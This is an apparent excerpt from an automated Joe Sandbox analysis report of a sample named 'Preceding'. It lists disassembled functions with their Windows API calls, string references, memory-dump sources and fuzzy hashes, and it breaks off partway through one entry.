Part of subcall function 002EF292: Sleep.KERNEL32 ref: 002EF30A

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: e107d24fba85c61278a1932b5cf57176108e9030aa25f45f711e3d77d669fa76
Instruction ID: c1e35fb7b83d327269ed01356b1bd945308fa1e4795a663f9d51869b44868abc
Opcode Fuzzy Hash: e107d24fba85c61278a1932b5cf57176108e9030aa25f45f711e3d77d669fa76
Instruction Fuzzy Hash: F871BC75A00205AFCB06EF68C880AEEBBB5EF4D310F118459E916AB351DB34AD918F90

Function 002EB881 Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 002EB8C0
GetKeyboardState.USER32(?), ref: 002EB8D5
SetKeyboardState.USER32(?), ref: 002EB936
PostMessageW.USER32(?,00000101,00000010,?), ref: 002EB964
PostMessageW.USER32(?,00000101,00000011,?), ref: 002EB983
PostMessageW.USER32(?,00000101,00000012,?), ref: 002EB9C4
PostMessageW.USER32(?,00000101,0000005B,?), ref: 002EB9E7

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: d93c9f6746935a929911575e009f60275a307f91666450034dfcafad7f6e2d32
Instruction ID: c095969e1cdc7b5701215137b76e70e5ab6a4a1affe726d2131de7f2f42a814f
Opcode Fuzzy Hash: d93c9f6746935a929911575e009f60275a307f91666450034dfcafad7f6e2d32
Instruction Fuzzy Hash: AA5135A05A43D63DFB374A368C55BB7BEA95B06304F488489E1C5568D3C3D8ACE4DB10

Function 002EB6A1 Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 002EB6E0
GetKeyboardState.USER32(?), ref: 002EB6F5
SetKeyboardState.USER32(?), ref: 002EB756
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 002EB782
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 002EB79F
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 002EB7DE
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 002EB7FF

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 56f87be7dc5d5a68455850fe74f2164da22c73d357fd83743c42bf04d009eaac
Instruction ID: ac5906f9d44a463b2b7bf01553d638f6d7353d45f7c61af3dc1a689e42e829eb
Opcode Fuzzy Hash: 56f87be7dc5d5a68455850fe74f2164da22c73d357fd83743c42bf04d009eaac
Instruction Fuzzy Hash: 3D5124A19A43D63DFB338B36CC11BB7BE985B06304F488489E0D84A8D2D394ECA4DB50

Function 002B57A1 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,002B5F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 002B57E3
__fassign.LIBCMT ref: 002B585E
__fassign.LIBCMT ref: 002B5879
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 002B589F
WriteFile.KERNEL32(?,FF8BC35D,00000000,002B5F16,00000000,?,?,?,?,?,?,?,?,?,002B5F16,?), ref: 002B58BE
WriteFile.KERNEL32(?,?,00000001,002B5F16,00000000,?,?,?,?,?,?,?,?,?,002B5F16,?), ref: 002B58F7

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 87ceed25a83da103893f1396e9727a6ca2daae1538c2606b834eda85ef6492eb
Instruction ID: 54b04b96c10da740a22c1c3192f55ed283ea654bfc8e1789e159d5bd361a7ae1
Opcode Fuzzy Hash: 87ceed25a83da103893f1396e9727a6ca2daae1538c2606b834eda85ef6492eb
Instruction Fuzzy Hash: E151D371A10659EFCB11CFA8D881BEEBBF8EF09350F14411AE955EB291D730A951CFA0

Function 002A3090 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 002A30BB
___except_validate_context_record.LIBVCRUNTIME ref: 002A30C3
_ValidateLocalCookies.LIBCMT ref: 002A3151
__IsNonwritableInCurrentImage.LIBCMT ref: 002A317C
_ValidateLocalCookies.LIBCMT ref: 002A31D1

Strings

csm, xrefs: 002A3166

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: c2401aa9dd3ebbff71bc62b383645c53ce6bf1006a4a5314d88c0f78519cff24
Instruction ID: 0207d45c029a5660f163a07e3c815fa9dcd849c0874e51e4b3078b18605d780e
Opcode Fuzzy Hash: c2401aa9dd3ebbff71bc62b383645c53ce6bf1006a4a5314d88c0f78519cff24
Instruction Fuzzy Hash: F241C634E202199BCF10DF68CC85A9EBBB5AF46324F148155F819AB392DB31DB25CF91

Function 00301B15 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00303AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00303AD7
Part of subcall function 00303AAB: _wcslen.LIBCMT ref: 00303AF8

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00301B6F
WSAGetLastError.WSOCK32 ref: 00301B7E
WSAGetLastError.WSOCK32 ref: 00301C26
closesocket.WSOCK32(00000000), ref: 00301C56

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
String ID:
API String ID: 2675159561-0
Opcode ID: d7da606e5ca10c3b5631ace72735a69aa2fecbef52541f0dbd6ee703a6c0d598
Instruction ID: 6ce7a2c6dca622c043249c293e270a32551e7e8cf5393f7dc44f7d7706f03c8f
Opcode Fuzzy Hash: d7da606e5ca10c3b5631ace72735a69aa2fecbef52541f0dbd6ee703a6c0d598
Instruction Fuzzy Hash: 4041F531601114AFEB12EF64C894BA9BBEDEF46324F158059F8059B2D2D774ED81CBE1

Function 002ED7AB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 002EE6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,002ED7CD,?), ref: 002EE714

Part of subcall function 002EE6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,002ED7CD,?), ref: 002EE72D

lstrcmpiW.KERNEL32(?,?), ref: 002ED7F0
MoveFileW.KERNEL32(?,?), ref: 002ED82A
_wcslen.LIBCMT ref: 002ED8B0
_wcslen.LIBCMT ref: 002ED8C6
SHFileOperationW.SHELL32(?), ref: 002ED90C

Strings

\*.*, xrefs: 002ED89E

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 3164238972-1173974218
Opcode ID: 9ec03e69e9a6ff5cfee3603d7e83f650741f8a04b4a5c78109821daf716b66e7
Instruction ID: 4a3505c7dfc5b4057691b17c324ee908792e9d9e699c7ee4141755d0df6e58a2
Opcode Fuzzy Hash: 9ec03e69e9a6ff5cfee3603d7e83f650741f8a04b4a5c78109821daf716b66e7
Instruction Fuzzy Hash: 454191718552599FDF12EFA1C981ADE73B8AF08340F4000EAA509EB142EF34AB99CF10

Function 002F42B9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 002F4310
TranslateAcceleratorW.USER32(?,00000000,?), ref: 002F4367
TranslateMessage.USER32(?), ref: 002F4390
DispatchMessageW.USER32(?), ref: 002F439A
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002F43AB

Strings

(5, xrefs: 002F437D

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID: (5
API String ID: 2256411358-4024434197
Opcode ID: b458d899f02803935beab05ae0d793d3127d2f98202fb52c7a11cb22ce5b767a
Instruction ID: a769505cc190a0f21a6c3978854bb7c49729c285530c67ec5f6d198be5985efd
Opcode Fuzzy Hash: b458d899f02803935beab05ae0d793d3127d2f98202fb52c7a11cb22ce5b767a
Instruction Fuzzy Hash: D431D67052434FDEEB26EF34D848BB7BBACAB02385F1445B9D652C21A0E3F4A465CB51

Function 00313899 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 003138B8
GetWindowLongW.USER32(?,000000F0), ref: 003138EB
GetWindowLongW.USER32(?,000000F0), ref: 00313920
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00313952
SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 0031397C
GetWindowLongW.USER32(?,000000F0), ref: 0031398D
SetWindowLongW.USER32(?,000000F0,00000000), ref: 003139A7

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 7861a28ce599f99692cd620f8ba198d70f5c261749ca4a747a45e51046c78b49
Instruction ID: 269d3d3b40a1f8b9889514e091a96eb5ad6c1879ca2617b206fb41b42ee0f0db
Opcode Fuzzy Hash: 7861a28ce599f99692cd620f8ba198d70f5c261749ca4a747a45e51046c78b49
Instruction Fuzzy Hash: 8D314270704255AFDB2ACF58DC84FA537A8FB8A720F1641A4F5448B2B2CBB0AD84DB41

Function 002E808D Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002E80D0
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002E80F6
SysAllocString.OLEAUT32(00000000), ref: 002E80F9
SysAllocString.OLEAUT32(?), ref: 002E8117
SysFreeString.OLEAUT32(?), ref: 002E8120
StringFromGUID2.OLE32(?,?,00000028), ref: 002E8145
SysAllocString.OLEAUT32(?), ref: 002E8153

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: adca3c15067b155c7aa8e220bb1ae8e89498817eb6f0a79b3af3657b84ce3530
Instruction ID: de3ab9679d783139ad27f99da30e1cb6255f97b8ccaadba9af2dcbc0079e1151
Opcode Fuzzy Hash: adca3c15067b155c7aa8e220bb1ae8e89498817eb6f0a79b3af3657b84ce3530
Instruction Fuzzy Hash: 72219572610219AF9F10DFA9CC84CFA73ECEB09360B448425F94DDB290DE74EC468B60

Function 002E8164 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002E81A9
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002E81CF
SysAllocString.OLEAUT32(00000000), ref: 002E81D2
SysAllocString.OLEAUT32 ref: 002E81F3
SysFreeString.OLEAUT32 ref: 002E81FC
StringFromGUID2.OLE32(?,?,00000028), ref: 002E8216
SysAllocString.OLEAUT32(?), ref: 002E8224

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: bca00eca9dd3f7e92bb44c8b1adb1e95d75df2b88b2c0abfd3024efbe90f7518
Instruction ID: ee089fb3bd24d9bb7bd0497b5ae02918e609dba3f628650bb8308d6de2207505
Opcode Fuzzy Hash: bca00eca9dd3f7e92bb44c8b1adb1e95d75df2b88b2c0abfd3024efbe90f7518
Instruction Fuzzy Hash: 4B21B371610245BF9B10DFB9DC88DAA77ECEB0A360B408125FA49CB2A0DE74EC41CB64

Function 002F0E79 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 002F0E99
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 002F0ED5

Strings

nul, xrefs: 002F0F0E

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 021dcd7f501683d70999ae036118b1886a62f917955613d3eebb3cf5045dab9b
Instruction ID: f486bd5ac5055e17aa4a651fc4e8f54e11106331633e61b65e2df56a8df4163b
Opcode Fuzzy Hash: 021dcd7f501683d70999ae036118b1886a62f917955613d3eebb3cf5045dab9b
Instruction Fuzzy Hash: 5921827451030EABDB208F24DD84AAAB7E8BF553A0F204A29FDA5D72D1DB709861CB50

Function 002F0F4E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 002F0F6D
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 002F0FA8

Strings

nul, xrefs: 002F0FE0

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 057270769fdbca5fd98df370d20388c4a6b3d86b6b3f5502e409debd4cc232d7
Instruction ID: f7e52d6db86b0b5acf389779d3bfbaa113318a37f307dd757fd346390b87a3a7
Opcode Fuzzy Hash: 057270769fdbca5fd98df370d20388c4a6b3d86b6b3f5502e409debd4cc232d7
Instruction Fuzzy Hash: D221747151034ADBEB308F688C44AA9B7E8BF55760F204B2DFEA1E32D1DB709961DB50

Function 00314B4B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00287873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 002878B1
Part of subcall function 00287873: GetStockObject.GDI32(00000011), ref: 002878C5
Part of subcall function 00287873: SendMessageW.USER32(00000000,00000030,00000000), ref: 002878CF

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00314BB0
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00314BBD
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00314BC8
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00314BD7
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00314BE3

Strings

Msctls_Progress32, xrefs: 00314B81

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 3f631f5b6f060a406609502dae15f78c90a15b3ebe8910360c0d9e3b1edf36b6
Instruction ID: 893b9ecd4bf9ae96ff854bcf12a901f8a3110ef79cb015088c4d69dfc4a74050
Opcode Fuzzy Hash: 3f631f5b6f060a406609502dae15f78c90a15b3ebe8910360c0d9e3b1edf36b6
Instruction Fuzzy Hash: 891193B1150219BEEF129FA4CC85EEB7F9DEF09798F018110B648A60A0CA71DC61DBA4

Function 002E6078 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 002E608D
_memcmp.LIBVCRUNTIME ref: 002E60AB
_memcmp.LIBVCRUNTIME ref: 002E60BE
_memcmp.LIBVCRUNTIME ref: 002E60D6
_memcmp.LIBVCRUNTIME ref: 002E60EE

Strings

j`., xrefs: 002E609B

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: _memcmp
String ID: j`.
API String ID: 2931989736-53145996
Opcode ID: 5c94ead5879ff903596e1a271c525b30a4a91a212467f35654831be789e4a269
Instruction ID: 0ab55bc57be697926a1292c639124c50131c9c86260aaa610c71d4ca1f0ac7e7
Opcode Fuzzy Hash: 5c94ead5879ff903596e1a271c525b30a4a91a212467f35654831be789e4a269
Instruction Fuzzy Hash: C601F5F16A03767B96155A22DC46FABB31DAE713E8F000020FD099A242EB71ED34C6A0

Function 002EE30E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 002EE328
LoadStringW.USER32(00000000), ref: 002EE32F
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 002EE345
LoadStringW.USER32(00000000), ref: 002EE34C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 002EE390

Strings

%s (%d) : ==> %s: %s %s, xrefs: 002EE36D

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: 4697a475a1e4e93da57ba19734abffb351eef92dab492235f3feb8491a6610b9
Instruction ID: eba4c7ca6bc2f95c06149138918eb8ffad89a19be53ec6761f707f3436262136
Opcode Fuzzy Hash: 4697a475a1e4e93da57ba19734abffb351eef92dab492235f3feb8491a6610b9
Instruction Fuzzy Hash: BA0186F69003087FE7529BA49D89EF7776CD70D300F4185A1B705E6041E7749E844B71

Function 002F1312 Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 002F1322
EnterCriticalSection.KERNEL32(00000000,?), ref: 002F1334
TerminateThread.KERNEL32(00000000,000001F6), ref: 002F1342
WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 002F1350
CloseHandle.KERNEL32(00000000), ref: 002F135F
InterlockedExchange.KERNEL32(?,000001F6), ref: 002F136F
LeaveCriticalSection.KERNEL32(00000000), ref: 002F1376

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

